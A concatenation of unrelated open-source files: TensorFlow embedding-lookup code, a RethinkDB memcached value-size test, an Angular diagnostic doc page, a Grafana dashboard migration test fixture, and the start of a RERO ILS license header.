If `params` is a list, it represents a partition of the embedding parameters.
Each tensor in the list should have the same length, except for the first ones
which may have an additional element. For instance 10 parameters can be
partitioned in 4 tensors with length `[3, 3, 2, 2]`.
Args:
params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
Each tensor must be of rank 1 with fully-defined shape.
values: `Tensor` of values to be embedded with shape `[d0, ..., dn]`.
dimension: Embedding dimension. The user must specify either `dimension` or
`sampled_candidates`.
sampled_candidates: An optional `Tensor` of slice indices to keep along the
final dimension with shape `[d0, ..., dn, N]`. If given, `dimension` is
ignored. If `None`, looks up all candidates.
hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
function to combine the crosses fingerprints on SparseFeatureCrossOp
(optional).
name: An optional name for this op.
Returns:
A `Tensor` with shape `[d0, ..., dn, dimension]`.
If `sampled_candidates` is given, the output shape is `[d0, ..., dn, N]`
Raises:
ValueError: if dimension is not positive or the partition size is invalid.
"""
if isinstance(params, variables.PartitionedVariable):
params = list(params)
if not isinstance(params, list):
params = [params]
with ops.name_scope(name, "scattered_embedding_lookup",
params + [dimension, values]):
# Flatten the values
values_shape = array_ops.shape(values)
values = array_ops.reshape(values, [-1, 1])
if sampled_candidates is None:
if dimension is None:
raise ValueError(
"You must specify either dimension or sampled_candidates.")
if dimension <= 0:
raise ValueError("Dimension must be >0. Given is %d" % dimension)
sampled_candidates = array_ops.tile(array_ops.expand_dims(
math_ops.range(0, dimension), 0), array_ops.shape(values))
else:
dimension = array_ops.shape(sampled_candidates)[
math_ops.subtract(array_ops.rank(sampled_candidates), 1)]
sampled_candidates_shape = array_ops.shape(sampled_candidates)
dimension_tensor = array_ops.reshape(dimension, shape=[1,])
expected_shape = array_ops.concat([values_shape, dimension_tensor], 0)
with ops.control_dependencies([control_flow_ops.Assert(
math_ops.reduce_all(math_ops.equal(sampled_candidates_shape,
expected_shape)),
["The shape of sampled_candidates: ", sampled_candidates_shape,
" does not match the shape of values: ", values_shape])]):
# Flatten sampled_candidates, same way as values are flattened.
sampled_candidates = array_ops.reshape(sampled_candidates,
[-1, dimension])
num_partitions = len(params)
partition_sizes = []
for p in range(num_partitions):
shape = params[p].get_shape()
shape.assert_has_rank(1)
shape.assert_is_fully_defined()
partition_sizes.append(shape[0].value)
num_params = sum(partition_sizes) # Total number of parameters.
# Assert the size of each partition.
for p in range(num_partitions):
expected_size = (num_params - p - 1) // num_partitions + 1
if partition_sizes[p] != expected_size:
raise ValueError("Tensor %d in params has size %d, expected %d." %
(p, partition_sizes[p], expected_size))
# With two values v1 and v2 and 3 dimensions, we will cross
# [[0, 1, 2], [0, 1, 2]] with [[v1], [v2]].
tensors_to_cross = [sampled_candidates, values]
ids = sparse_feature_cross_op.sparse_feature_cross(
tensors_to_cross, hashed_output=True, num_buckets=num_params,
hash_key=hash_key)
ids = sparse_ops.sparse_tensor_to_dense(ids)
# No need to validate the indices since we have checked the params
# dimensions and we know the largest id.
result = embedding_ops.embedding_lookup(
params, ids, partition_strategy="div")
return array_ops.reshape(result,
array_ops.concat([values_shape, [dimension]], 0))
def scattered_embedding_lookup_sparse(params,
sparse_values,
dimension,
combiner=None,
default_value=None,
name=None,
hash_key=None):
"""Looks up embeddings of a sparse feature using parameter hashing.
See `tf.contrib.layers.scattered_embedding_lookup` for embedding with hashing.
Args:
params: A `Tensor`, `list` of `Tensors`, or `PartitionedVariable`.
Each tensor must be of rank 1 with fully-defined shape.
sparse_values: A 2-D `SparseTensor` containing the values to be embedded.
Some rows may be empty.
dimension: Embedding dimension
combiner: A string specifying how to combine embedding results for each
entry. Currently "mean", "sqrtn" and "sum" are supported, with "mean"
the default.
default_value: The value to use for an entry with no features.
name: An optional name for this op.
hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
function to combine the crosses fingerprints on SparseFeatureCrossOp
(optional).
Returns:
Dense tensor with shape [N, dimension] with N the number of rows in
sparse_values.
Raises:
TypeError: If sparse_values is not a SparseTensor.
ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
"""
if combiner is None:
logging.warn("The default value of combiner will change from \"mean\" "
"to \"sqrtn\" after 2016/11/01.")
combiner = "mean"
if isinstance(params, variables.PartitionedVariable):
params = list(params)
if not isinstance(params, list):
params = [params]
if not isinstance(sparse_values, sparse_tensor.SparseTensor):
raise TypeError("sparse_values must be SparseTensor")
with ops.name_scope(name, "scattered_embedding_lookup_sparse",
params + [sparse_values]) as scope:
# Fill in the empty rows.
if default_value is None:
# Random default values to reduce the risk of collision.
if sparse_values.dtype == dtypes.string:
default_value = "6ZxWzWOHxZ"
else:
default_value = 1288896567
sparse_values, _ = sparse_ops.sparse_fill_empty_rows(
sparse_values, default_value)
segment_ids = sparse_values.indices[:, 0]
if segment_ids.dtype != dtypes.int32:
segment_ids = math_ops.cast(segment_ids, dtypes.int32)
values = sparse_values.values
values, idx = array_ops.unique(values)
embeddings = scattered_embedding_lookup(
params, values, dimension, hash_key=hash_key)
if combiner == "sum":
embeddings = math_ops.sparse_segment_sum(embeddings, idx, segment_ids,
name=scope)
elif combiner == "mean":
embeddings = math_ops.sparse_segment_mean(embeddings, idx, segment_ids,
name=scope)
elif combiner == "sqrtn":
embeddings = math_ops.sparse_segment_sqrt_n(embeddings, idx, segment_ids,
name=scope)
else:
raise ValueError("Combiner must be one of 'mean', 'sqrtn' or 'sum'.")
return embeddings
def embedding_lookup_unique(params, ids, name=None):
"""Version of embedding_lookup that avoids duplicate lookups.
This can save communication in the case of repeated ids.
Same interface as embedding_lookup. Except it supports multi-dimensional `ids`
which allows to not reshape input/output to fit gather.
Args:
params: A list of tensors with the same shape and type, or a
`PartitionedVariable`. Shape `[index, d1, d2, ...]`.
ids: A one-dimensional `Tensor` with type `int32` or `int64` containing
the ids to be looked up in `params`. Shape `[ids1, ids2, ...]`.
name: A name for this operation (optional).
Returns:
A `Tensor` with the same type as the tensors in `params` and dimension of
`[ids1, ids2, d1, d2, ...]`.
Raises:
ValueError: If `params` is empty.
"""
with ops.name_scope(name, "EmbeddingLookupUnique", [params, ids]):
ids = ops.convert_to_tensor(ids)
shape = array_ops.shape(ids)
ids_flat = array_ops.reshape(
ids, math_ops.reduce_prod(shape, keep_dims=True))
unique_ids, idx = array_ops.unique(ids_flat)
unique_embeddings = embedding_ops.embedding_lookup(params, unique_ids)
embeds_flat = array_ops.gather(unique_embeddings, idx)
embed_shape = array_ops.concat(
[shape, array_ops.shape(unique_embeddings)[1:]], 0)
embeds = array_ops.reshape(embeds_flat, embed_shape)
embeds.set_shape(ids.get_shape().concatenate(
unique_embeddings.get_shape()[1:]))
return embeds
def _sampled_scattered_embedding_lookup_sparse(params,
sp_values,
dimension=None,
sampled_candidates=None,
hash_key=None,
with_sign_hash=False,
name=None):
"""Looks up embeddings using parameter hashing for sparse values.
This method looks up selected embedding dimensions if `sampled_candidates` is
given, otherwise looks up all dimensions.
The i-th embedding component of a value v in `values` is found by retrieving
the weight whose index is a fingerprint of the pair (v,i).
The concept is explored as "feature hashing" for model compression in this
paper: http://arxiv.org/pdf/1504.04788.pdf
This is logically equivalent to:
* Transforming `sp_values` (which has shape `[d0, d1]`) into a one-hot
`Tensor` of shape `[d0, N]`.
* Multiplying with a `Tensor` `h` of shape `[N, dimension]`, where
`h(i, j) = params[hash(i, j)]`.
Args:
params: A float `Tensor` with rank 1 and fully-defined shape.
sp_values: A 2D `SparseTensor` to be embedded with shape `[d0, d1]`.
dimension: An int `Tensor` of the final dimension. The user needs to provide
either `dimension` or `sampled_candidates`.
sampled_candidates: An optional `Tensor` of column indices to keep along
the final dimension with shape `[d0, N]`. If given, `dimension` is
ignored. If `None`, looks up all candidates.
hash_key: Specify the hash_key that will be used by the `FingerprintCat64`
function to combine the crosses fingerprints on SparseFeatureCrossOp
(optional).
with_sign_hash: A `bool` indicating whether `h(i, j)` should be multiplied
by `+1` or `-1`, where the value selected is determined by hashing
`(i, j)`. This is often necessary to remove bias resulting from hash
collisions.
name: An optional name for this op.
Returns:
A `Tensor` of shape `[d0, dimension]`.
If `sampled_candidates` is given, the output shape is `[d0, N]`.
Raises:
TypeError: If sp_values is not `SparseTensor`.
ValueError: If both `dimension` and `sampled_candidates` are `None`.
"""
if not isinstance(sp_values, sparse_tensor.SparseTensor):
raise TypeError("sp_values must be SparseTensor")
with ops.name_scope(
name=name,
default_name="sampled_scattered_embedding_lookup_sparse",
values=[sp_values, params, dimension, sampled_candidates]) as name_scope:
segment_ids = sp_values.indices[:, 0]
if sampled_candidates is not None:
# Tile sampled_candidates so there is one line corresponding to each
# element in sp_values.values
sampled_candidates = array_ops.gather(sampled_candidates, segment_ids)
embeddings = _sampled_scattered_embedding_lookup(
params, sp_values.values, dimension=dimension,
sampled_candidates=sampled_candidates,
hash_key=hash_key, name="values_lookup")
if with_sign_hash:
signs = _sampled_scattered_embedding_lookup(
array_ops.constant([-1., 1.]), sp_values.values, dimension=dimension,
sampled_candidates=sampled_candidates, hash_key=hash_key,
name="signs_lookup")
embeddings = math_ops.multiply(signs, embeddings, name="signs_hash")
if segment_ids.dtype != dtypes.int32:
segment_ids = math_ops.cast(segment_ids, dtypes.int32)
num_segments = array_ops.shape(sp_values)[0]
return math_ops.unsorted_segment_sum(embeddings, segment_ids,
num_segments=num_segments,
name=name_scope)
def embedding_lookup_sparse_with_distributed_aggregation(
params,
sp_ids,
sp_weights,
partition_strategy="mod",
name=None,
combiner=None,
max_norm=None):
"""Computes embeddings for the given ids and weights.
Embeddings belonging to same param are aggregated on that device first. This
op is intended to decrease data transmission and improve parallelism. See
`tf.nn.embedding_lookup_sparse` for the functionality and example of this op.
Args:
params: A single tensor representing the complete embedding tensor,
or a list of P tensors all of same shape except for the first dimension,
representing sharded embedding tensors. Alternatively, a
`PartitionedVariable`, created by partitioning along dimension 0. Each
element must be appropriately sized for the given `partition_strategy`.
sp_ids: N x M SparseTensor of int64 ids (typically from FeatureValueToId),
where N is typically batch size and M is arbitrary.
sp_weights: either a SparseTensor of float / double weights, or None to
indicate all weights should be taken to be 1. If specified, sp_weights
must have exactly the same shape and indices as sp_ids.
partition_strategy: A string specifying the partitioning strategy, relevant
if `len(params) > 1`. Currently `"div"` and `"mod"` are supported. Default
is `"mod"`. See `tf.nn.embedding_lookup` for more details.
name: Optional name for the op.
combiner: A string specifying the reduction op. Currently "mean", "sqrtn"
and "sum" are supported.
"sum" computes the weighted sum of the embedding results for each row.
"mean" is the weighted sum divided by the total weight.
"sqrtn" is the weighted sum divided by the square root of the sum of the
squares of the weights.
max_norm: If not None, each embedding is normalized to have l2 norm equal
to max_norm before combining.
Returns:
A dense tensor representing the combined embeddings for the
sparse ids. For each row in the dense tensor represented by sp_ids, the op
looks up the embeddings for all ids in that row, multiplies them by the
corresponding weight, and combines these embeddings as specified.
Raises:
TypeError: If sp_ids is not a SparseTensor, or if sp_weights is neither
None nor SparseTensor.
ValueError: If combiner is not one of {"mean", "sqrtn", "sum"}.
"""
if combiner is None:
logging.warn("The default value of combiner will change from \"mean\" "
"to \"sqrtn\" after 2016/11/01.")
combiner = "mean"
if combiner not in ("mean", "sqrtn", "sum"):
raise ValueError("combiner must be one of 'mean', 'sqrtn' or 'sum'")
if isinstance(params, variables.PartitionedVariable):
params = list(params) # Iterate to get the underlying Variables.
if not isinstance(params, list):
params = [params]
if not isinstance(sp_ids, sparse_tensor.SparseTensor):
raise TypeError("sp_ids must be SparseTensor")
ignore_weights = sp_weights is None
if not ignore_weights:
if not isinstance(sp_weights, sparse_tensor.SparseTensor):
raise TypeError("sp_weights must be either None or SparseTensor")
sp_ids.values.get_shape().assert_is_compatible_with(
sp_weights.values.get_shape())
sp_ids.indices.get_shape().assert_is_compatible_with(
sp_weights.indices.get_shape())
sp_ids.dense_shape.get_shape().assert_is_compatible_with(
sp_weights.dense_shape.get_shape())
# TODO(yleon): Add enhanced node assertions to verify that sp_ids and
# sp_weights have equal indices and shapes.
with ops.name_scope(name, "embedding_lookup_sparse",
params + [sp_ids]) as name:
segment_ids = sp_ids.indices[:, 0]
if segment_ids.dtype != dtypes.int32:
segment_ids = math_ops.cast(segment_ids, dtypes.int32)
ids = sp_ids.values
if ignore_weights:
ids, idx = array_ops.unique(ids)
else:
idx = None
weights = None if ignore_weights else sp_weights.values
embeddings = _embedding_lookup_with_distributed_aggregation(
params,
ids,
partition_strategy=partition_strategy,
max_norm=max_norm,
weights=weights,
idx=idx,
segment_ids=segment_ids)
# Set weights to all one if ignore weights.
if ignore_weights:
weights = array_ops.fill([array_ops.shape(segment_ids)[0]], 1)
if weights.dtype != embeddings.dtype:
weights = math_ops.cast(weights, embeddings.dtype)
# Reshape weights.
ones = array_ops.fill(
array_ops.expand_dims(array_ops.rank(embeddings) - 1, 0), 1)
bcast_weights_shape = array_ops.concat([array_ops.shape(weights), ones], 0)
orig_weights_shape = weights.get_shape()
weights = array_ops.reshape(weights, bcast_weights_shape)
if embeddings.get_shape().ndims is not None:
weights.set_shape(
orig_weights_shape.concatenate(
[1 for _ in range(embeddings.get_shape().ndims - 1)]))
if combiner == "mean":
weight_sum = math_ops.segment_sum(weights, segment_ids)
embeddings = math_ops.div(embeddings, weight_sum)
elif combiner == "sqrtn":
weights_squared = math_ops.pow(weights, 2)
weight_sum = math_ops.segment_sum(weights_squared, segment_ids)
weight_sum_sqrt = math_ops.sqrt(weight_sum)
embeddings = math_ops.div(embeddings, weight_sum_sqrt)
elif combiner != "sum":
assert False, "Unrecognized combiner"
return embeddings
def _do_gather(params, ids, name=None):
"""Deals with doing gather differently for resource variables."""
if isinstance(params, resource_variable_ops.ResourceVariable):
return params.sparse_read(ids, name=name)
return array_ops.gather(params, ids, name=name)
def _embedding_lookup_with_distributed_aggregation(params,
ids,
partition_strategy="mod",
name=None,
max_norm=None,
weights=None,
idx=None,
segment_ids=None):
"""Lookup helper for embedding_lookup_sparse_with_distributed_aggregation."""
if params is None or params == []: # pylint: disable=g-explicit-bool-comparison
raise ValueError("Need at least one param")
if isinstance(params, variables.PartitionedVariable):
params = list(params) # Iterate to get the underlying Variables.
if not isinstance(params, list):
params = [params]
def maybe_normalize(x):
if max_norm is not None:
if x.get_shape().ndims is not None:
ndims = x.get_shape().ndims
else:
ndims = array_ops.size(array_ops.shape(x))
return clip_ops.clip_by_norm(x, max_norm, axes=list(range(1, ndims)))
return x
with ops.name_scope(name, "embedding_lookup_with_distributed_aggregation",
params + [ids]) as name:
np = len(params) # Number of partitions
# Preserve the resource variable status to avoid accidental dense reads.
if not any(
isinstance(p, resource_variable_ops.ResourceVariable) for p in params):
params = ops.convert_n_to_tensor_or_indexed_slices(params, name="params")
if np == 1:
with ops.colocate_with(params[0]):
ret = maybe_normalize(_do_gather(params[0], ids))
ignore_weights = weights is None
if not ignore_weights:
if weights.dtype != ret.dtype:
weights = math_ops.cast(weights, ret.dtype)
# Reshape to allow broadcast
ones = array_ops.fill(
array_ops.expand_dims(array_ops.rank(ret) - 1, 0), 1)
bcast_weights_shape = array_ops.concat(
[array_ops.shape(weights), ones], 0)
orig_weights_shape = weights.get_shape()
weights = array_ops.reshape(weights, bcast_weights_shape)
# Set weights shape after reshape
if ret.get_shape().ndims is not None:
weights.set_shape(
orig_weights_shape.concatenate(
[1 for _ in range(ret.get_shape().ndims - 1)]))
ret *= weights
return math_ops.segment_sum(ret, segment_ids, name=name)
else:
return math_ops.sparse_segment_sum(ret, idx, segment_ids, name=name)
else:
ids = ops.convert_to_tensor(ids, name="ids")
flat_ids = array_ops.reshape(ids, [-1])
original_indices = math_ops.range(array_ops.size(flat_ids))
# Create p_assignments and set new_ids depending on the strategy.
if partition_strategy == "mod":
p_assignments = flat_ids % np
new_ids = flat_ids // np
elif partition_strategy == "div":
# Compute num_total_ids as the sum of dim-0 of params, then assign to
# partitions based on a constant number of ids per partition. Optimize
# if we already know the full shape statically.
dim_0_size = params[0].get_shape()[0]
for p in xrange(1, np):
dim_0_size += params[p].get_shape()[0]
if dim_0_size.value:
num_total_ids = constant_op.constant(dim_0_size.value, flat_ids.dtype)
else:
dim_0_sizes = []
for p in xrange(np):
if params[p].get_shape()[0].value is not None:
dim_0_sizes.append(params[p].get_shape()[0].value)
else:
with ops.colocate_with(params[p]):
dim_0_sizes.append(array_ops.shape(params[p])[0])
num_total_ids = math_ops.reduce_sum(
math_ops.cast(array_ops.stack(dim_0_sizes), flat_ids.dtype))
ids_per_partition = num_total_ids // np
extras = num_total_ids % np
p_assignments = math_ops.maximum(flat_ids // (ids_per_partition + 1), (
flat_ids - extras) // ids_per_partition)
# Emulate a conditional using a boolean indicator tensor
is_in_first_extras_partitions = math_ops.cast(p_assignments < extras,
flat_ids.dtype)
new_ids = (is_in_first_extras_partitions * (flat_ids %
(ids_per_partition + 1)) +
(1 - is_in_first_extras_partitions) * (
(flat_ids - extras) % ids_per_partition))
else:
raise ValueError("Unrecognized partition strategy: " +
partition_strategy)
# Cast partition assignments to int32 for use in dynamic_partition.
# There really should not be more than 2^32 partitions.
p_assignments = math_ops.cast(p_assignments, dtypes.int32)
# Partition list of ids based on assignments into np separate lists
gather_ids = data_flow_ops.dynamic_partition(new_ids, p_assignments, np)
# Similarly, partition the original indices.
pindices = data_flow_ops.dynamic_partition(original_indices,
p_assignments, np)
# Do np separate lookups, finding embeddings for plist[p] in params[p]
partitioned_result = []
for p in xrange(np):
with ops.colocate_with(params[p]):
partitioned_result.append(_do_gather(params[p], gather_ids[p]))
ignore_weights = weights is None
if not ignore_weights:
# Partition weights according to pindices.
partitioned_weight = []
for p in xrange(np):
partitioned_weight.append(array_ops.gather(weights, pindices[p]))
# Reshape each partition result.
element_shape = params[0].get_shape()[1:]
for p in params[1:]:
element_shape = element_shape.merge_with(p.get_shape()[1:])
if element_shape.is_fully_defined():
for p in xrange(np):
with ops.colocate_with(params[p]):
partitioned_result[p] = array_ops.reshape(
partitioned_result[p],
array_ops.concat([array_ops.shape(pindices[p]), element_shape],
0))
else:
with ops.colocate_with(params[0]):
params_shape = array_ops.shape(params[0])
for p in xrange(np):
with ops.colocate_with(params[p]):
partitioned_result[p] = array_ops.reshape(
partitioned_result[p],
array_ops.concat([
array_ops.shape(pindices[p]), array_ops.slice(
params_shape, [1], [-1])
], 0))
# Normalize each partition result.
for p in xrange(np):
with ops.colocate_with(params[p]):
partitioned_result[p] = maybe_normalize(partitioned_result[p])
if not ignore_weights:
# Multiply each partition result with partition weights.
for p in xrange(np):
with ops.colocate_with(params[p]):
if partitioned_weight[p].dtype != partitioned_result[p].dtype:
partitioned_weight[p] = math_ops.cast(partitioned_weight[p],
partitioned_result[p].dtype)
# Reshape partition weights.
ones = array_ops.fill(
array_ops.expand_dims(
array_ops.rank(partitioned_result[p]) - 1, 0), 1)
bcast_weights_shape = array_ops.concat(
[array_ops.shape(partitioned_weight[p]), ones], 0)
orig_weights_shape = partitioned_weight[p].get_shape()
partitioned_weight[p] = array_ops.reshape(partitioned_weight[p],
bcast_weights_shape)
if partitioned_result[p].get_shape().ndims is not None:
partitioned_weight[p].set_shape(
orig_weights_shape.concatenate([
1
for _ in range(partitioned_result[p].get_shape().ndims -
1)
]))
partitioned_result[p] *= partitioned_weight[p]
partitioned_segment_ids = []
for p in xrange(np):
if not ignore_weights:
# Partition segment_ids according to pindices.
p_segment_ids = array_ops.gather(segment_ids, pindices[p])
# Number the p_segment_ids to meet segment_sum's requirements. Note
# that unique_p_segment_ids contains unique segment ids of this
# partiton and these ids' order is unchanged.
unique_p_segment_ids, unique_p_segment_idx = array_ops.unique(
p_segment_ids)
partitioned_segment_ids.append(unique_p_segment_ids)
# segment_sum this partition's result.
with ops.colocate_with(params[p]):
partitioned_result[p] = math_ops.segment_sum(
partitioned_result[p], unique_p_segment_idx)
else:
# When ignore weights, we need to get indexs of elements in idx and
# segment_ids.
_, exclude_idx = array_ops.setdiff1d(idx, pindices[p])
all_idx = math_ops.range(array_ops.shape(idx)[0])
_, include_idx = array_ops.setdiff1d(all_idx, exclude_idx)
# Gather segment_ids and idx according to indexs.
p_segment_ids = array_ops.gather(segment_ids, include_idx)
p_idx = array_ops.gather(idx, include_idx)
# Number the p_segment_ids, same as ignore_weights case above.
unique_p_segment_ids, unique_p_segment_idx = array_ops.unique(
p_segment_ids)
_, unique_p_idx_idx = array_ops.unique(p_idx)
partitioned_segment_ids.append(unique_p_segment_ids)
with ops.colocate_with(params[p]):
partitioned_result[p] = math_ops.sparse_segment_sum(
partitioned_result[p], unique_p_idx_idx, unique_p_segment_idx)
# Concat each partition's segment_ids and result for final segment_sum.
concat_segment_ids = array_ops.concat(partitioned_segment_ids, 0)
concat_partitioned_result = array_ops.concat(partitioned_result, 0)
return math_ops.unsorted_segment_sum(
concat_partitioned_result,
concat_segment_ids,
math_ops.reduce_max(concat_segment_ids) + 1,
name=name)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# Copyright 2010-2012 RethinkDB, all rights reserved.
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, 'common')))
import memcached_workload_common
def readline(s):
buf = ""
while not buf.endswith("\r\n"):
buf += s.recv(1)
return buf
def abbreviate(s):
if len(s) < 50: return repr(s)
else: return repr(s[:25]) + "..." + repr(s[-25:])
def expect(s, string):
msg = ""
while len(msg) < len(string):
msg += s.recv(len(string) - len(msg))
if msg != string:
raise ValueError("Didn't get what we expected: expected %s, got %s" % (abbreviate(string), abbreviate(msg)))
def expect_get_response(s, value):
expect(s, "VALUE x 0 %d\r\n" % len(value))
print " value decl...",
expect(s, value + "\r\n")
print " content...",
expect(s, "END\r\n")
print " ok."
def test_sizes_one_way(ap, x, y, s):
print "Sending a %d-byte value..." % x,
s.send(("set x 0 0 %d\r\n" % x) + ("a" * x) + "\r\n")
max_legal_value_size = 1024 * 1024
if x <= max_legal_value_size:
expect(s, "STORED\r\n")
print " getting...",
s.send("get x\r\n")
print " sent get...",
expect_get_response(s, "a" * x)
print "Now %sing upto length %d..." % (ap, y),
s.send(("%s x 0 0 %d\r\n" % (ap, y - x)) + ("b" * (y - x)) + "\r\n")
if y <= max_legal_value_size:
expect(s, "STORED\r\n")
print " getting...",
s.send("get x\r\n")
print " sent get...",
expect_get_response(s, ("a" * x + "b" * (y - x) if ap == "append" else "b" * (y - x) + "a" * x))
else:
expect(s, "SERVER_ERROR object too large for cache\r\n")
print " too big... ok."
else:
expect(s, "SERVER_ERROR object too large for cache\r\n")
print " too big... ok."
def test_sizes_another_way(ap, x, y, s):
test_sizes_one_way(ap, x, y, s)
def test_sizes(x, y, s):
test_sizes_one_way("append", x, y, s)
test_sizes_another_way("prepend", x, y, s)
op = memcached_workload_common.option_parser_for_socket()
opts = op.parse(sys.argv)
with memcached_workload_common.make_socket_connection(opts) as s:
# 250 - the maximum small value
# 251 - the minimum large buf (in a leaf node)
# 4080 - the size of a large buf block (the largest large buf that uses a single block)
# 8160 - twice the size of a large buf block
# 65536 - 16-bit rollover
# 73710 - netrecord causes some kind of weird failure at this point sometimes
# (234 / 4) * 4080 - the biggest large value that uses one level
# 10 * 1048576 - the maximum legal value size
sizes = [250, 4079, 4080, 4081, 8160, 8161, (232 / 4) * 4080 - 1, (232 / 4) * 4080, (232 / 4) * 4080 + 1, 1048576, 10 * 1048577]
for x in sizes:
for y in sizes:
if x < y:
test_sizes(x, y, s)
s.send("quit\r\n")
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Suffix not supported
This diagnostic detects when the `.px`, `.%`, and `.em` suffixes are used with an attribute
binding.
```html
<img [attr.width.px]="5" />
```
## What's wrong with that?
These suffixes are only available for style bindings. They do not have any meaning when binding to an attribute.
## What should I do instead?
Rather than using the `.px`, `.%`, or `.em` suffixes that are only supported in style bindings,
move this to the value assignment of the binding.
```html
<img [attr.width]="'5px'" />
```
## Configuration requirements
[`strictTemplates`](tools/cli/template-typecheck#strict-mode) must be enabled for any extended diagnostic to emit.
`suffixNotSupported` has no additional requirements beyond `strictTemplates`.
## What if I can't avoid this?
This diagnostic can be disabled by editing the project's `tsconfig.json` file:
```json
{
"angularCompilerOptions": {
"extendedDiagnostics": {
"checks": {
"suffixNotSupported": "suppress"
}
}
}
}
```
See [extended diagnostic configuration](extended-diagnostics#configuration) for more info.
|
unknown
|
github
|
https://github.com/angular/angular
|
adev/src/content/reference/extended-diagnostics/NG8106.md
|
{
"annotations": {
"list": [
{
"builtIn": 1,
"datasource": {
"type": "grafana",
"uid": "-- Grafana --"
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"type": "dashboard"
}
]
},
"editable": true,
"fiscalYearStartMonth": 0,
"graphTooltip": 0,
"links": [],
"panels": [
{
"description": "Tests v33 migration behavior when panel datasource is explicitly null. Should remain null after migration (returnDefaultAsNull: true).",
"id": 1,
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Target with UID reference should migrate to full object",
"refId": "A"
}
],
"title": "Panel Datasource: null → should stay null",
"type": "stat"
},
{
"datasource": {
"type": "prometheus",
"uid": "existing-ref-uid"
},
"description": "Tests v33 migration behavior when panel datasource is already a proper object reference. Should remain unchanged.",
"id": 2,
"targets": [
{
"datasource": {
"type": "elasticsearch",
"uid": "existing-target-uid"
},
"description": "Target with existing object should remain unchanged",
"refId": "A"
}
],
"title": "Panel Datasource: existing object → should stay unchanged",
"type": "stat"
},
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Tests v33 migration when panel datasource is a string name. Should convert to proper object with uid, type, apiVersion.",
"id": 3,
"title": "Panel Datasource: string name → should migrate to object",
"type": "table"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Tests v33 migration when panel has datasource string but empty targets array. Panel datasource should still migrate.",
"id": 4,
"title": "Panel Datasource: string name with empty targets → should migrate",
"type": "table"
},
{
"autoMigrateFrom": "graph",
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Tests v33 target migration with various edge cases: null target (unchanged), valid string (migrated), non-existing string (preserved), missing datasource field (unchanged).",
"id": 5,
"targets": [
{
"description": "Null target datasource should remain null",
"refId": "A"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Valid string should migrate to object",
"refId": "B"
},
{
"datasource": {
"uid": "non-existing-ds"
},
"description": "Non-existing datasource should be preserved as-is (migration returns nil)",
"refId": "C"
},
{
"description": "Target without datasource field should remain unchanged",
"refId": "D"
}
],
"title": "Target Datasources: mixed null/string/non-existing scenarios",
"type": "timeseries"
},
{
"description": "Tests v33 migration when panel datasource is null but targets have mixed reference types (object, string). Panel should stay null, targets should migrate appropriately.",
"id": 6,
"targets": [
{
"datasource": {
"type": "prometheus",
"uid": "existing-ref"
},
"description": "Existing object target should remain unchanged",
"refId": "A"
},
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "String target should migrate to object",
"refId": "B"
},
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Default datasource string should migrate to object",
"refId": "C"
}
],
"title": "Panel: null datasource with mixed target types",
"type": "timeseries"
},
{
"datasource": {},
"description": "Tests v33 migration behavior with empty string datasource. Should migrate to empty object {} based on MigrateDatasourceNameToRef logic.",
"id": 7,
"targets": [
{
"datasource": {},
"description": "Empty string target should also migrate to empty object {}",
"refId": "A"
}
],
"title": "Empty string datasource → should return empty object {}",
"type": "stat"
},
{
"datasource": {
"uid": "completely-missing-ds"
},
"description": "Tests v33 migration with completely unknown datasource names. Since migration returns nil for unknown datasources, they should be preserved unchanged.",
"id": 8,
"targets": [
{
"datasource": {
"uid": "also-missing-ds"
},
"description": "Unknown target datasource should remain unchanged (migration returns nil)",
"refId": "A"
},
{
"datasource": {},
"description": "Empty string target should migrate to {}",
"refId": "B"
}
],
"title": "Non-existing datasources → should be preserved as-is",
"type": "table"
},
{
"collapsed": true,
"description": "Tests v33 migration handles nested panels within collapsed rows. Nested panel datasources should migrate same as top-level panels.",
"id": 9,
"panels": [
{
"datasource": {
"apiVersion": "v1",
"type": "loki",
"uid": "non-default-test-ds-uid"
},
"description": "Nested panel with string datasource should migrate to proper object reference, proving row panel recursion works.",
"id": 10,
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "prometheus",
"uid": "default-ds-uid"
},
"description": "Nested target should also migrate from string to object",
"refId": "A"
}
],
"title": "Nested Panel: string datasource → should migrate to object",
"type": "timeseries"
}
],
"title": "Row Panel: nested panels should also migrate",
"type": "row"
}
],
"schemaVersion": 33,
"tags": [],
"templating": {
"list": []
},
"time": {
"from": "now-6h",
"to": "now"
},
"timepicker": {},
"timezone": "",
"title": "V33 Panel Datasource Name to Ref Test",
"weekStart": ""
}
|
json
|
github
|
https://github.com/grafana/grafana
|
apps/dashboard/pkg/migration/testdata/output/single_version/v33.panel_ds_name_to_ref.v33.json
|
# -*- coding: utf-8 -*-
#
# This file is part of RERO ILS.
# Copyright (C) 2017 RERO.
#
# RERO ILS is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# RERO ILS is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RERO ILS; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, RERO does not
# waive the privileges and immunities granted to it by virtue of its status
